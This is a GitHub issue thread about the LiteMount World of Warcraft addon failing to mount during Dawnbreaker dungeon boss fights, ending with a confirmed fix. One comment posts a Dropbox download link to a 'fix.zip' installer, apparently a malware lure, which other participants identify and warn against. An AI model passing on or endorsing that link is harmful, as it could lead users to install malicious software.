### ISSUE TITLE
TWW - Can't mount during boss fights that require mounting

### ISSUE THREAD

**Issue by NoShotz** [xod-wow/LiteMount#285]
Macro does not work during boss fights in the Dawnbreaker dungeon, which has two boss fights that require you to mount during them.

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NoShotz** [comment]
> Download ***** In the installer menu, select "gcc."

That is very clearly some kind of malware considering that a fix for this issue requires no installer, nor does it require anything to do with GCC as zero WoW addons have anything do with GCC

**Comment by Xorag** [comment]
Same issue, might need to grab map/instance IDs for this same as tindral

**Comment by mbattersby** [comment]
Well that sucks it worked fine in the beta.

I'll get a fix out shortly.

Please do not install random zips into your whale add-ons it's not a good
habit to get into they could do dangerous things.

**Comment by mbattersby** [comment]
Tried the dungeon on follower dungeons, didn't have any issues. It's working for me.

Worth noting that if you have your own combat macro set, you'll have to handle it yourself (same as Tindral). Otherwise please paste the bug report info after it fails.

**Comment by NoShotz** [comment]
I don't even have the custom combat macro enabled, so it would be using the default one.

**Comment by mbattersby** [comment]
Hmm, worked fine for the first boss but not for the last boss. Is that the same issue you had?

**Comment by NoShotz** [comment]
It happened on the first and last boss for me.

**Comment by mbattersby** [comment]
I can't help you with the first boss I don't think, it's working fine for me.

**Comment by mbattersby** [comment]
Please try -5 and let me know

**Comment by Karrexe** [comment]
> Please try -5 and let me know

I had the same issue, and can confirm it works now with -5
